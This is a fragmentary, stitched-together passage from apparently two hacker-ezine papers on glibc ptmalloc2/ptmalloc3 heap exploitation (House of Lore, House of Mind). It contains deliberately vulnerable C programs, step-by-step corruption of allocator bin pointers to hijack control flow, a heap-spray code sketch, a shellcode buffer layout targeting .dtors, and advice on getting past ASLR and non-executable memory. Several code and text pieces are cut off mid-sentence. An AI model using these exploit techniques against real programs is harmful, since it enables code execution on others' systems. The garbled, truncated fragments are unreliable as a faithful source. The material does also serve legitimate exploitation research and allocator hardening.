first overwritten chunk to 0x9 = 0x8 + PREV_INUSE bit).
[ Franklin D. Roosevelt ]
.------------------------------.
---[ 3 ---[ LargeBin Corruption Method ]---
.------------------------------.
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
void evil_func(void)
{
printf("\nThis is an evil function. You become a cool \
hacker if you are able to execute it\n");
}
char *buff1, *buff2, *buff3;

void func1(void)
{
    char *lb1, *lb2;

    /* two requests with 512 < size < buff2's size (see the explanation below) */
    lb1 = (char *) malloc(1536);
    printf("\nLB1 -> [ %p ]", lb1);
    lb2 = (char *) malloc(1536);
    printf("\nLB2 -> [ %p ]\n", lb2);
}

int main(int argc, char *argv[])
{
    malloc(4096);
    buff1 = (char *) malloc(1024);
    printf("\nBuff1 -> [ %p ]", buff1);
    buff2 = (char *) malloc(2048);
    printf("\nBuff2 -> [ %p ]", buff2);
    buff3 = (char *) malloc(4096);
    printf("\nBuff3 -> [ %p ]\n", buff3);
    free(buff2);
    malloc(4096);             /* extra reserve (buff4): sorts buff2 into its largebin */
    strcpy(buff1, argv[1]);   /* the vulnerable copy */
    func1();
    return 0;
}
As you can see, we still need an extra reservation (buff4) after releasing
the second allocated chunk. This is because it is not a good idea to have a
corrupted "bk" pointer in a chunk that is still in the unsorted bin. When
that happens, the program usually breaks sooner or later on the
instructions:
But if we do not do anything wrong before the recently freed chunk is
placed in its corresponding bin, then we pass, without trouble, the next
area of code:
Having passed this code means that (buff2) has been introduced in its
corresponding largebin. Therefore we will reach this code:
if (!in_smallbin_range(nb)) {
bin = bin_at(av, idx);
This does not look good. The unlink( ) macro is called, and we know the
associated protection since version 2.3.6 of glibc. Going through there
would destroy all the work done until now.
Here comes one of the first differences in the largebin corruption method.
In 2.2.1 we said that after overwriting the "bk" pointer of the freed
chunk, two calls to malloc( ) with the same size should be carried out to
return a pointer *mem at an arbitrary memory address.
In largebin corruption, we must avoid this code at all costs. For this, the
two calls to malloc( ) must request less than buff2->size. Phantasmal told
us "512 < M < N", and that is what we see in our vulnerable application:
512 < 1536 < 2048.
As no chunk of this size (1536), or at least belonging to the same bin, has
previously been freed, "_int_malloc( )" tries to find a chunk that can
fulfill the request in the next bin after the one just scanned:
// Search for a chunk by scanning bins, starting with next largest bin.
++idx;
bin = bin_at(av,idx);
And here is where the magic comes: the following piece of code will be
executed:
victim = last(bin);
.....
else {
size = chunksize(victim);
/* unlink */
bck = victim->bk;
bin->bk = bck;
bck->fd = bin;
/* Exhaust */
if (remainder_size < MINSIZE) {
printf("\n[PTMALLOC2] -> Exhaust code!! You win!\n");
.....
return chunk2mem(victim);
}
/* Split */
else {
.....
set_foot(remainder, remainder_size);
check_malloced_chunk(av, victim, nb);
return chunk2mem(victim);
}
}
The code has been trimmed to show only the parts that are relevant to the
method we are describing. The calls to printf( ) are my own, and you will
soon see their usefulness.
It is also easy to see that the process is practically the same as in the
smallbin code. The last chunk of the respective largebin (last(bin)) is
taken into "victim" and unlinked (without the macro) before reaching the
user's control. Since we control "victim->bk", at first sight the attack
requirements are the same; so where is the difference?
The only possibility that remains, then, is that the vulnerable application
allows us to insert null bytes in the attack string, and therefore to
supply a value such as (0x00000610 = 1552). A request of 1536 bytes becomes
nb = 1544 after alignment, so remainder_size = 1552 - 1544 = 8 < MINSIZE,
the condition is fulfilled, and the "Exhaust" branch is taken. Let us see
it in action:
Perfect. We reach the second memory request, where we see that victim
equals 0xbffff044; returning it would provide a chunk whose *mem points to
the stack. However, set_foot( ) again gives us problems, and this is
obviously because we are not controlling the "size" field of this fake
chunk created on the stack.
This is where we have to overcome the last condition. Victim should point
to a memory location containing user-controlled data, so that we can enter
We end this section by saying that the largebin corruption method is not
just pure fantasy, as we have made it a reality. However, it is true that
finding the required preconditions for the attack in real-life applications
is almost impossible.
Note: Again, we have not tested all versions of glibc, but we noted the
following fixes in later versions:
else {
size = chunksize(victim);
/* unlink */
unlink(victim, bck, fwd);
/* Exhaust */
if (remainder_size < MINSIZE) {
set_inuse_bit_at_offset(victim, size);
if (av != &main_arena)
victim->size |= NON_MAIN_ARENA;
}
/* Split */
else {
What this means is that the unlink( ) macro has been newly introduced into
this code, and thus the classic pointer tests mitigate the attack.
[ Albert Einstein ]
.-------------------------.
---[ 4 ---[ Analysis of Ptmalloc3 ]---
.-------------------------.
Delving into the internals of Ptmalloc3 without warming up may seem
violent, but with a little help it is only child's play.
In order to understand the next sections correctly, I present here the most
notable differences in the code with respect to Ptmalloc2.
The basic operation remains the same; in the end it is another common
memory allocator, also based on a version of the Doug Lea allocator but
adapted to work with multiple threads.
struct malloc_chunk {
size_t prev_foot; /* Size of previous chunk (if free). */
size_t head; /* Size and inuse bits. */
struct malloc_chunk* fd; /* double links -- used only if free. */
struct malloc_chunk* bk;
};
As we can see, the names of our well-known "prev_size" and "size" fields
have changed, but their meaning remains the same. Furthermore, to the three
usual control bits an extra one has been added, called "CINUSE_BIT", which
indicates (in a redundant way) that the current chunk is allocated, as
opposed to PINUSE_BIT, which continues to report the allocation state of
the previous chunk. Both bits have their corresponding checking and
assignment macros.
The well-known "malloc_state" structure now stores the bins in two
different arrays for different uses:
mchunkptr smallbins[(NSMALLBINS+1)*2];
tbinptr treebins[NTREEBINS];
The first of them stores free memory chunks smaller than 256 bytes.
Treebins[] is responsible for larger pieces and uses a special tree
organization. Both arrays matter for the respective techniques discussed in
the following sections, where more details about their management and
corruption are provided.
char* least_addr;
mchunkptr dv;
size_t magic;
For security purposes, some of the most important macros follow:
The last macro you will frequently observe is "RTCHECK(e)", which is
nothing more than a wrapper for "__builtin_expect(e, 1)", already familiar
from previous studies of malloc.
In the next section we will see that all the precautions that have been
taken are not sufficient to mitigate the attack presented here.
[ Norman Augustine ]
.---------------------------------.
---[ 4.1 ---[ SmallBin Corruption (Reverse) ]---
.---------------------------------.
To begin, we compile Ptmalloc3 and link the library statically against the
vulnerable application presented in 2.2.1. After using the same method to
exploit that application (adjusting the evil_func( ) address of course,
which acts as our dummy shellcode), we obtain a segmentation violation in
malloc.c, particularly at the last instruction of this piece of code:
The application breaks when, after having overwritten the "bk" pointer of
buff2, we request a new buffer of the same size. Why does this happen?
#define unlink_first_small_chunk(M, B, P, I) {\
mchunkptr F = P->fd;\ [1]
.....
if (B == F)\
clear_smallmap(M, I);\
else if (RTCHECK(ok_address(M, F))) {\ [2]
B->fd = F;\ [3]
F->bk = B;\ [4]
}\
else {\
CORRUPTION_ERROR_ACTION(M);\
}\
}
Here, P is our overwritten chunk, and B is the bin belonging to that piece.
In [1], F takes the value of the "fd" pointer that we control (at the same
where the least_addr field is "the least address ever obtained from
MORECORE or MMAP"... then anything of higher value will pass this test.
We then arrive at the classic unlink steps: in [3] the "fd" pointer of the
bin is made to point to our manipulated address. In [4] is where the
segmentation violation occurs, as it tries to write the address of the bin
into (0x41414141)->bk. As this falls outside the allocated address space,
the fun ends.
The precautions are the same as in 2.2.1: F->bk must contain a writable
address, otherwise it will cause an access violation in [4].
If we fulfil all these conditions, the first chunk of the bin will be
unlinked and the following piece of code will be triggered:
mem = chunk2mem(p);
check_malloced_chunk(gm, mem, nb);
goto postaction;
.....
postaction:
POSTACTION(gm);
return mem;
[ P. Williams ]
.----------------------------------------.
---[ 4.2 ---[ LargeBin Method (TreeBin Corruption) ]---
.----------------------------------------.
In Ptmalloc3, large chunks (i.e. larger than 256 bytes) are stored in a
tree structure where each chunk has a pointer to its parent and keeps two
pointers to its children (left and right), if it has any. The code that
defines this structure is the following:
struct malloc_tree_chunk {
  /* The first four fields must be compatible with malloc_chunk */
  size_t                    prev_foot;
  size_t                    head;
  struct malloc_tree_chunk* fd;
  struct malloc_tree_chunk* bk;

  struct malloc_tree_chunk* child[2];
  struct malloc_tree_chunk* parent;
  bindex_t                  index;
};
else {
nb = pad_request(bytes);
if (ms->treemap != 0 && (mem = tmalloc_large(ms, nb)) != 0) {
check_malloced_chunk(ms, mem, nb);
goto postaction;
}
}
If we tried to exploit this program in the same way as for Ptmalloc2, the
application would first break in the "unlink_large_chunk( )" macro, which
is very similar to "unlink_first_small_chunk( )". The most important lines
of this macro are these:
F = X->fd;\ [1]
R = X->bk;\ [2]
F->bk = R;\ [3]
R->fd = F;\ [4]
Thus we now know that both the "fd" and "bk" pointers of the overwritten
chunk must point to writable memory addresses; otherwise this would lead to
an invalid memory access.
When this loop is first entered, "t" is equal to the address of the first
chunk in the tree_bin[] corresponding to the size of the requested buffer.
The loop continues while "t" still has some child and, finally, "v"
(victim) will contain the smallest piece that can satisfy the request.
The trick for solving our problem is to exit the loop after the first
iteration. For this, we must make "leftmost_child(t)" return a "0" value.
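The macro in question is, roughly (from the ptmalloc3/dlmalloc source):

/* the left child if present, otherwise the right one */
#define leftmost_child(t) \
  ((t)->child[0] != 0 ? (t)->child[0] : (t)->child[1])

That is, both child pointers of the chunk we control must be zero.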
[ Ralph Johnson ]
.-----------------------------.
---[ 4.3 ---[ Implement Security Checks ]---
.-----------------------------.
Ptmalloc3 could be safer than it seems at first, but for that you need to
have defined the FOOTERS constant at compile time (which is not the
default).
#define get_mstate_for(p)\
((mstate)(((mchunkptr)((char*)(p) +\
(chunksize(p))))->prev_foot ^ mparams.magic))
#if FOOTERS
mstate fm = get_mstate_for(p);
#else /* FOOTERS */
mstate fm = (mstate)msp;
#endif /* FOOTERS */
if (!ok_magic(fm)) {
USAGE_ERROR_ACTION(fm, p);
return;
}
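where ok_magic() is, roughly:

#define ok_magic(M)  ((M)->magic == mparams.magic)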
Moreover, one must be aware that the current flow could be broken even
before the USAGE_ERROR_ACTION( ) call if reading fm->magic causes a
segmentation fault due to a wrong value obtained by get_mstate_for( ).
How to deal with this cookie, and the probability analysis needed to
predict its value at runtime, is an old issue, and we will not talk more
about it here. Though one may remember the PaX case: perhaps an overwritten
pointer can point beyond the "size" field of a chunk and, through a future
STRxxx( ) or MEMxxx( ) call, crush its data without having altered
"prev_foot". Skape did an excellent job in his "Reducing the effective
entropy of gs cookies" [4] for the Windows platform. It could give you some
fantastic ideas to apply. Who knows; it all depends on the vulnerability
and the inherent requirements of the tested application.
Anyone who has read the source code has probably noticed that Ptmalloc3's
unlink...( ) macros omit the classic tests implanted in glibc to check the
doubly linked list. We do not dwell on this because we know that a real
implementation would take it into account and should add this integrity
check. However, I cannot perform a more detailed study until someone
decides in the future to base glibc on Ptmalloc3.
victim = av->top;
size = chunksize(victim);
[ Danny Thorpe ]
.-----------------------------------.
---[ 4.3.1 ---[ Secure Heap Allocator (Utopian) ]---
.-----------------------------------.
headers cannot be located adjacent to the data. Creating a macro that adds
8 bytes to the address of a header for direct access to the data is very
simple, but it has never been a safe option.
Then we come to the point where the use of cookies between the allocated
memory fragments becomes essential. This obviously has side effects. The
most efficient approach would be for this cookie (say 4 bytes) to be the
last 4 bytes of each allocated chunk, with the goal of preserving
alignment, since putting it between two chunks would require a more
complicated and possibly slower management.
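As a toy illustration of the idea (only a hedged sketch, not part of any
real allocator; all names are hypothetical, and the wrapper asks the caller
for the size, something a real allocator would track itself):

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

static unsigned int heap_cookie;

static void cookie_init(void)
{
    /* a real implementation would read /dev/urandom instead */
    srand((unsigned int) time(NULL));
    heap_cookie = (unsigned int) rand();
}

void *cookie_malloc(size_t n)
{
    unsigned char *p;

    if (!heap_cookie)
        cookie_init();
    p = malloc(n + sizeof heap_cookie);     /* 4 extra bytes at the end */
    if (p)
        memcpy(p + n, &heap_cookie, sizeof heap_cookie);
    return p;
}

void cookie_free(void *mem, size_t n)
{
    unsigned char *p = mem;

    if (p && memcmp(p + n, &heap_cookie, sizeof heap_cookie) != 0) {
        fprintf(stderr, "*** heap cookie smashed, aborting\n");
        abort();
    }
    free(mem);
}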
Besides this, we could also take ideas from "Electric Fence - Red-Zone
memory allocator" by Bruce Perens [5]. His protection ideas are:
if ( slot->mode != ALLOCATED ) {
if ( internalUse && slot->mode == INTERNAL_USE )
.....
else {
EF_Abort("free(%a): freeing free memory.",address);
slot = slotForUserAddress(address);
if ( !slot )
EF_Abort("free(%a): address not from malloc().", address);
The second, to take one example, uses paging and its protection mechanism
in a very clever way. Extracted directly from the manpage, we read the core
of the method:
"Each malloc allocation is placed on its own virtual memory page, with
the end of the buffer at the end of the page's memory, and the next
page is kept unallocated. As a result, accesses beyond the end of the
buffer cause a bus error immediately. When memory is freed, libgmalloc
deallocates its virtual memory, causing reads or writes to the freed
buffer cause a bus error."
Note: That is a really interesting idea, but you should take into account
that such a technique is not _that_ effective because it would sacrifice a
lot of memory. It would induce a PAGE_SIZE allocation (4096 bytes is a
common value, or getpagesize( ) ;)) even for a small chunk.
[ Richard Pattis ]
.------------.
.---------------.
| .text |
.---------------.
| .data |
.---------------.
...
.---------------.
| Chunks |
.---------------.
..
||
||
\/
/\
||
||
..
.--------------------.
| Memory Page | <- This Page is not writable
.--------------------.
| Chunk Information |
.--------------------.
| The Hash Table |
.--------------------.
| Memory Page |
.--------------------.
| The Stack | <- This Page is not writable
.--------------------.
2.- To get the entry in the Hash Table: shift *Result* 7 bits to the right.
3.- Go over the linked list until the correct chunk is found.
.-------------------------------------.
| The Hash Table |
. ................................... .
| Pointers to each Chunk Information | --> Chunk Information (Hash Next
.-------------------------------------. to the next Chunk Information)
1.- A fixed area is mapped below the Hash table for the Chunks Information.
3.- When a new Chunk Information is needed, the first element in the free
list is used.
5.- If the map is empty, extra memory is mapped for it (and the guard page
is moved).
[ Chris Pirillo ]
.------------------.
---[ 4.3.3 ---[ OpenBSD malloc ]---
.------------------.
This implementation [11] [13] has the following design goals: simple,
unpredictable, fast, less metadata space overhead, and robust (for example,
freeing a bogus pointer or a double free should be detected)...
About the metadata: it keeps track of mmap'ed regions by storing their
address and size in a hash table, keeps the existing data structure for
chunk allocations, and uses a free region cache with a fixed number of
slots:
3.- If the number of pages cached gets too large, unmap some.
[ Mitchell Kapor ]
.-----------------------------.
---[ 5 ---[ Miscellany, ASLR and More ]---
.-----------------------------.
We already mentioned something about ASLR and Non Exec Heap in the Malloc
Des-Maleficarum paper. Now we do the same with the method we have studied.
For the purposes of this technique, I considered ASLR disabled in all the
examples of this article. If this protection is enabled in real life, then
the randomization only affects the position of the final fake chunk on the
stack and our ability to predict a memory address close enough to a saved
return address that can be overwritten. This should not be an utterly
impossible task, and we consider that brute force is always a possibility
we will have at hand in the most restrictive situations.
Obviously, a non-executable heap does not affect the techniques described
in this paper, as one might place a shellcode anywhere else, although we
warn that if the heap is not executable it is very likely that the stack
will not be either. Therefore one should use a ret2libc-style attack or
return into mprotect( ) to bypass this protection.
This is an old theme, and each reader will know how to analyze the problems
underlying the attacked system.
The preconditions are clear; this has been seen repeatedly throughout this
article. The obvious difference between the PoCs that I presented here and
the applications you use every day (such as email clients or web browsers)
is that one cannot predict at first the current state of the heap. And this
is really a problem, because unless the heap is in a fairly stable and
predictable state, the chances of exploitation will be minimal.
But very high-level hackers have already met this class of problems before,
and over time they have designed and developed a series of techniques which
allow reordering the heap so that both the position of the allocated chunks
and the data contained within them are parameters controlled by the user.
Among these techniques, we must name the two best known:
- Heap Spray
- Heap Feng Shui
You can read something about them in the following paper presented at
BlackHat 2007 [8]. In short, we can say that the "Heap Spray" technique
simply fills the heap as much as possible by requesting large amounts of
memory and placing there repetitions of nop sleds plus the opportune
shellcode, and then simply uses a predictable memory address for the
"primitive 4-byte overwrite". A very clever idea in this technique is to
make the nop sled values equal to the selected address, so that the spray
is self-referential.
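A hedged sketch of that trick follows (0x0c0c0c0c is the classic example:
read as code it is a chain of harmless "or al, 0x0c" instructions, read as
a pointer it lands back inside the sprayed region; block sizes, counts and
the placeholder payload are arbitrary choices of mine):

#include <stdlib.h>
#include <string.h>

#define SPRAY_VAL   0x0c0c0c0cUL       /* sled value == landing address   */
#define BLOCK_SIZE  (1024 * 1024)      /* 1 MB per sprayed allocation     */
#define NUM_BLOCKS  200                /* a few hundred MB of heap        */

static const unsigned char shellcode[] = "\xcc";   /* placeholder payload */

void spray(void)
{
    int i;
    size_t j;

    for (i = 0; i < NUM_BLOCKS; i++) {
        unsigned long *block = malloc(BLOCK_SIZE);
        if (block == NULL)
            break;
        for (j = 0; j < BLOCK_SIZE / sizeof(unsigned long); j++)
            block[j] = SPRAY_VAL;                   /* self-referential sled */
        memcpy((char *)block + BLOCK_SIZE - sizeof(shellcode),
               shellcode, sizeof(shellcode));       /* payload at the end    */
    }
}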
... and finally tries to create the buffer to overflow in one of these
holes, knowing that it will always be adjacent to one of its buffers
containing information controlled by the exploiter.
We will not talk about this more here. Just let us say that although some
of these methodologies may seem time consuming and fatiguing, without them
[ Rich Cook ]
.---------------.
---[ 6 ---[ Conclusions ]---
.---------------.
In this article we have seen how The House of Lore hid inside itself a
power much greater than we imagined. We also presented a fun example
showing that, despite not being vulnerable to any of the techniques we knew
so far, it was still vulnerable to one that until now had only been
described theoretically.
Reviewing and analyzing in depth some of the security mechanisms that have
been implanted in this library allowed us to find that further studies will
be needed to discover new vulnerabilities and areas of code that can be
manipulated for personal fun and profit.
If you want a tip of mine on how to improve your hacking, here it goes:
with this new article I hope I have changed the meaning of my words, and
shown that sometimes in hacking you make mistakes, but you should never
stop investigating and repairing your errors. Everything we do is for fun,
and we will do it as long as we exist on land and in cyberspace.
[ Galileo Galilei ]
.-------------------.
---[ 7 ---[ Acknowledgments ]---
.-------------------.
Indeed, the last details in the translation of this article are Dreg's
work, and it would never have been what it is without his invaluable help.
For the rest, thanks also to all the people I met at dsrCON!, all very
friendly, outgoing and all with their particular touch of madness. I am not
going to give more names, but thanks to all of them.
And remember...
Happy Hacking!
.--------------.
---[ 8 ---[ References ]---
.--------------.
http://www.rootedcon.es/
[10] dnmalloc
http://www.fort-knox.org/taxonomy/term/3
.----------------.
---[ 9 ---[ Wargame Code ]---
.----------------.
In this last section we attach the same "agents.c" program that we saw
above, but adapted to a network environment so that it can feasibly be used
in a server-exploitation wargame. At the same time, the code is a bit more
elaborate and robust.
The code should be adapted according to the needs of the manager conducting
or developing the wargame (such as the number of allowed incoming
connections, or the debugging information you want to give to the attacker
if the game becomes very difficult).
The attached archive includes a makefile which assumes that the compiled
ptmalloc2 library (libmalloc.a) is in the same directory as the source, to
be linked with netagents.c. Each person should adapt "malloc.c" to print
the information deemed necessary, but the basics would be the changes made
throughout this article, which let the attacker know from where the
requested memory chunks are extracted.
How does the attacker obtain the output of these changes? For simplicity,
"netagents.c" avoids calls to send( ) by closing the standard output
(stdout) and duplicating it onto the recently obtained client socket
(dup(CustomerID)). We use the same trick that shellcodes are expected to
use.
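The trick looks roughly like this ("CustomerID" being the accepted client
socket, as in the original code):

#include <unistd.h>

/* after accept(): redirect stdout to the client so that every printf()
   of the wargame binary travels over the network connection            */
static void bind_stdout_to_client(int CustomerID)
{
    close(1);            /* close the old standard output        */
    dup(CustomerID);     /* lowest free fd (1) is now the socket */
}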
"netagents.c" also includes a new menu option, "Show Heap State", in order
to see the state of the memory chunks that are being allocated or released
during its execution, this allows you to see if the head of any free chunk
has been overwritten. After some legal moves, a normal output would be
this:
+--------------------------------+
| Allocated Chunk (0x8093004) | -> Agents[0]
+--------------------------------+
| SIZE = 0x00000019 |
+--------------------------------+
+--------------------------------+
| Allocated Chunk (0x809301c) | -> Agents[1]
+--------------------------------+
| SIZE = 0x00000019 |
+--------------------------------+
+--------------------------------+
| Allocated Chunk (0x8093034) | -> Agents[1]->name
+--------------------------------+
| SIZE = 0x00000029 |
+--------------------------------+
+--------------------------------+
| Free Chunk (0x8093058) | -> Agents[1]->lastname
+--------------------------------+
| PREV_SIZE = 0x00000000 |
+--------------------------------+
| SIZE = 0x00000089 |
+--------------------------------+
| FD = 0x08050168 |
+--------------------------------+
| BK = 0x08050168 |
+--------------------------------+
+--------------------------------+
| Allocated Chunk (0x80930e4) | -> Agents[1]->desc
+--------------------------------+
| SIZE = 0x00000108 |
+--------------------------------+
Following the example of the perl exploit presented in 2.2.2, one might
design an exploit in C with a child process continually receiving the
responses from the server (menus and prompts), and the parent answering
these questions with a pause, for example one second per answer (if you
know what to respond, put that program to work...). The difficult task is
to predict the addresses on the stack: in the last phase of the attack, the
last reserved chunk should match the frame created by "edit_lastname( )",
since that is where we overwrite the saved return address and where the
program will probably break (it is obvious that ASLR, if enabled, adds a
new complexity to overcome).
What happens with failed attempts and segmentation faults? The program
captures SIGSEGV and informs the attacker that something bad has happened,
encouraging him to connect again. Only the child process becomes unstable,
and thus a new connection leaves everything clean for a new attack.
The last aid that one could provide to the attacker is to deliver the
source code, so that it can be studied locally to understand the
vulnerability before carrying the attack to the network environment.
|=-----------------------------------------------------------------------=|
|=----------------------=[ MALLOC DES-MALEFICARUM ]=---------------------=|
|=-----------------------------------------------------------------------=|
|=-----------------------------------------------------------------------=|
|=---------------=[ By blackngel ]=--------------=|
|=---------------=[ ]=--------------=|
|=---------------=[ <black *noSPAM* set-ezine.org> ]=--------------=|
|=---------------=[ <blackngel1 *noSPAM* gmail.org> ]=--------------=|
|=-----------------------------------------------------------------------=|
^^
*`* @@ *`* HACK THE WORLD
* *--* *
##     <black *noSPAM* set-ezine.org>
||     <blackngel1 *noSPAM* gmail.org>
* *
* * (C) Copyleft 2009 everybody
_* *_
---[ INDEX
1 - The History
2 - Introduction
4 - DES-Maleficarum...
7 - References
-----------------
---[ 1 ---[ THE HISTORY ]---
-----------------
On August 11, 2001, two papers were released in that same magazine, and
they demonstrated a new advance in the world of vulnerability exploitation.
MaXX described in his "Vudo malloc tricks" paper [1] the basic
implementation and algorithms of the GNU C Library's Doug Lea malloc(), and
he presented to the public various methods able to trigger arbitrary code
execution through heap overflows. At the same time, he showed a real-life
exploit against the "Sudo" application.
- unlink () method.
- frontlink () method.
... these methods were applicable until 2004, when the GLIBC library was
patched so that they no longer worked.
But not everything had been said on this topic. On October 11, 2005,
Phantasmal Phantasmagoria published on the "bugtraq" mailing list an
article whose name evokes a deep mystery: "Malloc Maleficarum" [4].
Phantasmal was also the author of the fantastic article "Exploiting the
Wilderness" [5], the Wilderness being the chunk most feared (at first) by
heap lovers.
And certainly, it was the revolution that opened minds again when the doors
had been closed.
The only fault of that article is that it did not show any proof of concept
demonstrating that each and every one of the techniques was possible.
[ Bertrand Russell ]
------------------
---[ 2 ---[ INTRODUCTION ]---
------------------
On the other hand, and very importantly, this article tries to correct
certain points of Malloc Maleficarum that were the object of wrong
interpretation. Mistakes that are today easier to see thanks to the
enormous work that Phantasmal gave us in his moment. He is an adept, a
"virtual adept" certainly...
NOTE: Except for The House of Prime, I have used an x86 Linux distro,
with a 2.6.24-23 kernel and glibc version 2.7, which shows that
these techniques are still applicable today. Also, I have checked
that some of them are available in 2.8.90.
In this article you will see, through the witches, that there are still
some ways to go. And we can walk them together ...
[ Victor Hugo ]
------------------------
---[ 3 ---[ WELCOME TO THE PAST ]---
------------------------
"unlink ()" assumed that if two chunks were allocated in the heap, and
second was vulnerable to being overwritten through an overflow of first,
a third fake chunk could be created and so deceive "free ()" to proceed
to unlink this second chunk and tie with the first.
#define unlink(P, BK, FD) { \
    FD = P->fd;             \
    BK = P->bk;             \
    FD->bk = BK;            \
    BK->fd = FD;            \
}
With P being the second chunk, "P->fd" was changed to point to a memory
area capable of being overwritten (such as .dtors - 12). If "P->bk" then
pointed to the address of a shellcode placed in memory by the exploiter (in
an environment variable, or perhaps in the first chunk itself), then this
address would be written in the third step of the unlink() code, into
"FD->bk". Then:
If "P->fd", pointing to the next chunk (FD), is not modified, then the
"bk" pointer of FD should point to P. The same is true with the previous
chunk (BK)... if "P->bk" points to the previous chunk, then the forward
pointer at BK should point to P. In any other case, mean an error in the
double linked list and thus the second chunk (P) has been hacked.
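Since then, the macro carries that very test; roughly, as it appears in
glibc 2.7:

#define unlink(P, BK, FD) {                                             \
    FD = P->fd;                                                         \
    BK = P->bk;                                                         \
    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))               \
        malloc_printerr (check_action,                                  \
                         "corrupted double-linked list", P);            \
    else {                                                              \
        FD->bk = BK;                                                    \
        BK->fd = FD;                                                    \
    }                                                                   \
}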
[ Xavier Zubiri ]
------------------------
---[ 4 ---[ DES-MALEFICARUM... ]---
------------------------
Read carefully what now comes. I just hope that at the end of this paper,
the witches have completely disappeared.
-----------------------
---[ 4.1 ---[ THE HOUSE OF MIND ]---
-----------------------
We will study "The House of Mind" technique here, step by step, so that
those who are starting out in these lands do not find too many problems
along the path... a path that may already be a little hard.
It also does not hurt to give a second view/opinion about how to develop
the exploit, which in my case had a small behavioral variation (we will see
it below).
Understanding this technique becomes much easier if I manage to present the
steps in a certain order; otherwise the mind jumps from one place to
another. In any case... test and play with the technique.
Two variants will be shown. Let's see the first one here:
NOTE 2: From here on, we always keep in mind that "free()" is executed on a
second chunk that can be overflowed by another chunk allocated
before it.
void
public_fREe(Void_t* mem)
{
mstate ar_ptr;
mchunkptr p; /* chunk corresponding to mem */
...
p = mem2chunk(mem);
...
ar_ptr = arena_for_chunk(p);
...
_int_free(ar_ptr, mem);
}
If p = (0x0804a000), then:
heap_for_ptr(p) -> (heap_info *) (0x08000000)
ar_ptr = ((heap_info *) (0x08000000))->ar_ptr
So what is looked up at (0x08000000) is the address of an "arena" (it will
be defined shortly). For now, we can say that at (0x08000000) there isn't
any address pointing to an "arena", so the application will soon break with
a segmentation fault (assuming an ET_EXEC with a base of 0x08048000).
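For reference, the lookup is performed, roughly, by these glibc macros
(HEAP_MAX_SIZE being 1 MB in the versions discussed here), which simply
mask the chunk address down to the enclosing heap boundary:

#define HEAP_MAX_SIZE   (1024 * 1024)   /* 1 MB */

#define heap_for_ptr(ptr) \
  ((heap_info *)((unsigned long)(ptr) & ~(HEAP_MAX_SIZE - 1)))

#define arena_for_chunk(ptr) \
  (chunk_non_main_arena(ptr) ? heap_for_ptr(ptr)->ar_ptr : &main_arena)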
It seems that our move ends here. As our first chunk is just behind the
second chunk at (0x0804a000) (but not by much), this only allows us to
overwrite forward, preventing us from writing anything at (0x08000000).
But since our first chunk starts at (0x0804a000) and we can overwrite far
ahead, we can place at (0x08100000) an arbitrary address (usually the
beginning of the data of our first chunk), provided the chunk later passed
to free() lies above that boundary.
Consider that we can change "ar_ptr" to any value. For example, we can make
it point to an environment variable or somewhere else. At that memory
address, "_int_free()" expects to find an "arena" structure.
mstate ar_ptr;
struct malloc_state {
mutex_t mutex;
INTERNAL_SIZE_T max_fast; /* low 2 bits used as flags */
mfastbinptr fastbins[NFASTBINS];
mchunkptr top;
mchunkptr last_remainder;
mchunkptr bins[NBINS * 2];
unsigned int binmap[BINMAPSIZE];
...
INTERNAL_SIZE_T system_mem;
INTERNAL_SIZE_T max_system_mem;
};
...
static struct malloc_state main_arena;
Soon it will be helpful to know this. The goal of The House of Mind is to
ensure that the unsorted_chunks() code is reached in "_int_free()":
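That code is, slightly abridged from glibc 2.7, the insertion of the freed
chunk at the head of the unsorted bin:

bck = unsorted_chunks(av);        /* av is attacker-controlled...       */
fwd = bck->fd;
p->fd = fwd;
p->bk = bck;
bck->fd = p;                      /* ...so this writes the address of p */
fwd->bk = p;                      /*    wherever we point bck + 8       */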
p = 0x081002a0 - 8;
...
bck = .dtors + 4 - 8
...
bck + 8 = DTORS_END = 0x08100298
Although the idea was good, K-sPecial warned us that "unsorted_chunks()"
does not, in fact, return the value of "av->bins[0]", but rather its
address ("&").
Indeed, we see that "bin_at()" returns the address and not the value.
Therefore another way must be taken. Bearing this in mind, we can do the
following:
But we have jumped here without crossing the road full of thorns. Our
friend Phantasmal also warned us that to reach this piece of code, certain
conditions must be met. Now we will see each of them, together with its
corresponding portion of code in "_int_free()".
3) The bit IS_MMAPPED must not be set into the "size" field.
/* consolidate backward */
if (!prev_inuse(p)) { ...
The path seems long and tortuous, but it is not so much when we control
most of the situations. Let's look at the vulnerable program of our friend
K-sPecial:
[-----]
/*
* K-sPecial's vulnerable program
*/
#include <stdio.h>
#include <stdlib.h>
}
malloc(1024); /* Request another chunk: (ptr2 != av->top) */
/* Incorrect input: 1048576 bytes */
fread (ptr, 1024 * 1024, 1, stdin);
[-----]
Note that the input allows NULL bytes without terminating our string. This
makes our task easier.
[-----]
0x0804a008
|
[Ax8][0h x 4][201h x 8][DTORS_END-12 x 246][(409h-Ax1028) x 721][409h] ...
| |
av->max_fast bins[0] size
|
.... [(&1st chunk + 8) x 256][NOPx2-JUMP 0x0c][40Dh][NOPx8][SHELLCODE]
| | |
0x08100000 prev_size (0x08100298) *mem (0x081002a0)
[-----]
1) The first call to free() overwrites the first 8 bytes with garbage, so
K-sPecial prefers to skip this area and to put at (0x08100000) the
address of the first chunk + 8 (data area) + 8 (0x0804a010). Here
begins the fake arena structure.
5) Fill the next chunks up to (0x08100000) with "A" characters, while
preserving the "size" field (409h) of each chunk. Each one has the
PREV_INUSE bit properly set.
7) The "prev_size" field of "p" must be "nop; nop; jmp 0x0c"; it will
jump to our shellcode when DTORS_END is executed at the end of the
application.
8) The "size" field of "p" must be greater than the value written in
"av->max_fast" and must also have the NON_MAIN_ARENA bit set, which
was the trigger for this whole story in The House of Mind.
After understanding some very solid ideas, I was really surprised when a
simple execution of K-sPecial's exploit produced the following output:
[-----]
[-----]
When the application is stopped before the first free(), we can see that
our buffer seems to be well formed: [A x 8] [0000] [102h x 8].
But once the first call to free() is completed, as we said, the first 8
bytes are trashed with memory addresses. Most surprising is that the memory
at 0x0804a010 (av) + 4 is set to zero (0x00000000).
This position should be "av->max_fast", which, being zero and not having
the NONCONTIGUOUS_BIT enabled, dumps the error above. This seems to happen
with the following instructions:
(void *)mutex_unlock(&ar_ptr->mutex);
So we can drop the 8 bytes of garbage and the hardcoded "mutex" value from
the exploit, and leave free() to do the rest for us.
[-----]
[-----]
It seems that the second chunk "p" again suffers the wrath of free(). The
